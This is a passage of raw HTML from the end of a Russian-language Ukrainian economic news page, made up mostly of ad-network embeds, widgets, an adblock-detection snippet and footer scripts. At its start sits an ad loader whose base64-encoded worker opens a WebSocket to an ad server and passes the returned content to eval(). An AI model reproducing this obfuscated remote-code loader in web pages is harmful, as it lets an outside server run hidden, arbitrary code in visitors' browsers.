return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div><a href="https://enovosty.com/news_economy/full/1102-kak-prodat-zemlyu-uroki-argentiny-foto" target="_blank"><img alt="Продать землю" src="https://enovosty.com/wp-content/uploads/2020/02/Zemlya2.jpg"></a></div><br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"><div id="cityLink"><a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"><img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"></a></div><div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"><img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td></tr> </table></div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"><script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br> <div id="M469261ScriptRootC781152"> <div id="M469261PreloadC781152"> Loading... </div> </div> <script> (function () { var script = document.createElement('script'); script.src = "//jsc.idealmedia.io/e/n/enovosty.com.781152.js?t=" + ((d = new Date()) ? '' + d.getUTCFullYear() + d.getUTCMonth() + d.getUTCDate() + d.getUTCHours() : ''); script.async = true; document.body.appendChild(script); })(); </script> <br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-290"></div><script type="text/javascript">new MTr('300-290', {site:907,format:0});</script><div id="lastafisha" class="slide" style="width:240px;margin:auto;"><script>jQuery(document).ready(function($){function region(){html = $('#lastafisha .anythingWindow .activePage .region').html();$('#lastafisha .head span').html(html);}$('#sliderafisha').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><p style="margin: 0;
font-size: 13pt;
font-weight: 700;
font-family: arial,verdana,tahoma;
text-align: left;
padding: 10px 32px 10px 35px;" class="head">Афиша<span style="float: right; font-size: 11px; line-height: 18px;">&nbsp;</span></p><ul id="sliderafisha"><li><ul class="tact"><li ><div id="post-4794646" class="postafisha"><span class="region">Киев 20&#160;февраля</span><div class="aimg"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-richard-dzhuell"><img width="170" height="132" alt="Кинопремьера: фильм «Ричард Джуэлл»" src="/wp-content/uploads/2020/02/richard-jewell.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-richard-dzhuell">Кинопремьера: фильм «Ричард Джуэлл»</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4794652" class="postafisha"><span class="region">Киев 20&#160;февраля</span><div class="aimg"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-rabota-bez-avtorstva"><img width="170" height="132" alt="Кинопремьера: фильм «Работа без авторства» ..." src="/wp-content/uploads/2020/02/avtor.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-rabota-bez-avtorstva">Кинопремьера: фильм «Работа без авторства» ...</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4794674" class="postafisha"><span class="region">Киев 27&#160;февраля</span><div class="aimg"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-stvoly-akimbo"><img width="170" height="132" alt="Кинопремьера: фильм «Стволы Акимбо»" src="/wp-content/uploads/2020/02/akimbo.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-stvoly-akimbo">Кинопремьера: фильм «Стволы Акимбо»</a></div></div></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div> </br></br><a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4795251"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4795251","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "7d3ced72ce";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script></body></html>